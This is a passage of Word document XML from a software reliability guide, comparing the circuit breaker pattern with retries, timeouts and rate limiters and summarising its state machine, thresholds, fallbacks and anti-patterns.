      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="7C335372">
          <v:rect id="_x0000_i4113" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="478107AA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12. Circuit Breaker vs Other Reliability Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0FEFAE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Circuit Breaker vs Retry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6AC7C4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Retry:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Calls a failing service again, hoping the failure is transient. Appropriate for brief, random failures (network blip, brief overload spike). Retries must be combined with exponential backoff and jitter to avoid retry storms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7E9712" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Circuit Breaker:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Stops calling a failing service when the failure is sustained. Appropriate for extended failures (service is down, dependency is unavailable).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C768AD1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The complementary relationship:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB868BD" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F96FB65" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Call → fails → retry (is this a transient failure?)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E371847" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">             → retry fails → retry again with backoff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42AB1351" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">                           → still fails → retry budget exhausted → circuit records failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3810D4C1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">                                                                  → circuit threshold breached → OPEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BED124" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">                                                                  → fail fast without retrying</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6A5AE6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Retries handle transient failures within the circuit's window. When retries consistently fail, the circuit opens and eliminates the retry overhead entirely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2DF71B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why retries alone are insufficient:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Retries amplify load on an already-struggling service. If 100 clients each retry 3 times, a service already at 100% capacity receives 400% load. The circuit breaker stops the amplification once the service is confirmed to be failing — not just transiently erroring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606DA092" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Circuit Breaker vs Timeout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B5F21B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Timeout:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Bounds the maximum time spent waiting for a response. Required for all network calls. Without timeouts, a hanging connection blocks threads indefinitely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2715D352" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Circuit Breaker:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Proactively stops calls based on observed failure patterns. Reacts to accumulated evidence of failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B58BEA5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The layered relationship:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669668DA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334153C7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Call → timeout (bounds per-call wait time)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C37D84D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">     → circuit breaker (bounds cumulative failure exposure)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3571E81A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>A timeout protects against individual long calls. A circuit breaker protects against repeated calls to a failing service. Both are required — a circuit breaker without timeouts would wait indefinitely on the first failure before recording it. A timeout without a circuit breaker allows thousands of slow calls before eventually tripping.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE1F719" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Circuit Breaker vs Rate Limiter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D16921" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Rate Limiter:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Controls call rate based on a predetermined quota. Protects the downstream from overload by limiting the rate of traffic. Operates regardless of downstream health.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBAD1F5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Circuit Breaker:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Controls call flow based on observed downstream health. Protects the caller's resources when the downstream is failing. Operates based on failure evidence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36157BF8" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>When both are needed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7141BC5F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>A rate limiter without a circuit breaker: the downstream is failing, but rate-limited calls continue reaching it (at the limited rate), consuming its resources and the caller's threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E47C35" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>A circuit breaker without a rate limiter: the downstream is healthy but under heavy load. All calls succeed but the downstream is at 100% capacity. No circuit protection because failure rate is low (calls succeed). Rate limiter would have prevented overload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357D9BC0" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Both protect the downstream but from different threat vectors: rate limiter prevents overload, circuit breaker prevents cascading failure during outages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECCEBD2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:pict w14:anchorId="58152EAE">
          <v:rect id="_x0000_i4114" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="067FA452" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mental Model Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CF86C6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5972417B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Circuit Breaker = Adaptive Failure Detector + Traffic Controller + Recovery Prober</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F46E693" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644"/>
    <w:p w14:paraId="2E08558B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>The Core State Machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C67B8F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  CLOSED   → monitor → failure evidence accumulates → OPEN (fail fast)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297ECA0F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  OPEN     → wait open_timeout → HALF-OPEN (probe recovery)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001A6244" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  HALF-OPEN → N test requests → all succeed → CLOSED (recovery confirmed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3882C1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">                              → any fail    → OPEN (still failing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FCD480" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644"/>
    <w:p w14:paraId="4F70DEB0" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>The Sliding Window (failure evidence accumulator):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381BEE12" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  Count-based:  last N calls, regardless of time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2288F651" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">                → good for stable call rates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5E49BA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  Time-based:   last T seconds, regardless of count</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3F6FA3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">                → good for variable call rates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAA9ED9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9CD48E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  What to record: network failures, timeouts, 5xx responses, slow calls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9330D1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  What NOT to record: 4xx client errors, business logic rejections, circuit's own rejections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC4849C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644"/>
    <w:p w14:paraId="6D2047D6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>The Failure Threshold Evaluation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A70BDA1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  failure_rate = failures / total_calls (within window)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222777B9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  slow_call_rate = slow_calls / total_calls (within window)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F28AA74" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36201176" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  If failure_rate &gt; threshold AND total_calls &gt; minimum → OPEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074AB63C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  If slow_call_rate &gt; threshold AND total_calls &gt; minimum → OPEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583DD185" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  (Either condition independently opens the circuit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569BBE38" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644"/>
    <w:p w14:paraId="2FDD618E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Fallback Hierarchy (best to worst):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF45E0D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  1. Cached response (real data, potentially stale)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC8EDEA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  2. Secondary service (degraded but functional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165C1801" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  3. Default response (safe, empty, non-personalized)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6611AAB7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  4. Queued request (async, no data loss)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECF0BD7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  5. Graceful error (fast, clear, actionable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78061D61" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644"/>
    <w:p w14:paraId="1DA2101F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>The Complementary Pattern Stack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D512EBB" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  Timeout        → bounds per-call wait time (required baseline)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7AA1FC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Circuit Breaker → bounds cumulative failure exposure (fail fast)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A529AC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  Bulkhead       → bounds resource consumption per dependency (containment)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583C7F41" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  Retry + Backoff → handles transient failures (within circuit's window)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EABD4D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644"/>
    <w:p w14:paraId="7F6D00E5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Configuration Trade-offs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C84DCD" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  failure_threshold low   → sensitive (opens fast, false positives)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065D67A6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  failure_threshold high  → permissive (opens slow, false negatives)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485E0B4B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  window_size small       → reactive (fast detection, high variance)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE41ABB" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  window_size large       → stable (slow detection, low variance)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE253A4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  open_timeout short      → fast recovery probe (frequent re-testing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AFC75F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  open_timeout long       → conservative recovery (reduces re-open risk)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568046AD" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644"/>
    <w:p w14:paraId="12243969" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>The Critical Anti-patterns:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BB2D77" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  Shared circuit breakers → unrelated failures couple services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CBEA2D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  No fallback → fast fail delivers no value (user gets instant error vs slow error)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E37FCF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  No monitoring → silent degradation goes undetected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AB22A3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  Retrying CallNotPermittedException → defeats circuit breaker's purpose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105C7333" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  Timeout &gt; window accumulation time → circuit opens too slowly to protect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BC36E8" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>The deepest insight at a senior level: </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>the circuit breaker is not a failure handler — it is a system stability mechanism.</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Individual call failures are expected and handled by timeouts and retries. The circuit breaker addresses a higher-order problem: </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>what happens to the overall system when individual failures are not transient but sustained?</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Without the circuit breaker, sustained downstream failures cause sustained resource exhaustion that propagates upward through the call chain, converting a localized service failure into a global system outage. The circuit breaker contains this propagation by converting </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>slow failures</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> (30-second timeouts, exhausted thread pools, queue buildup) into </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>fast failures</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve"> (microsecond rejections, freed threads, bounded queues) — preserving the system's capacity to function at a reduced level rather than collapsing entirely. This is the </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>fundamental reliability insight: </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>the speed of failure matters as much as the fact of failure.</w:t>
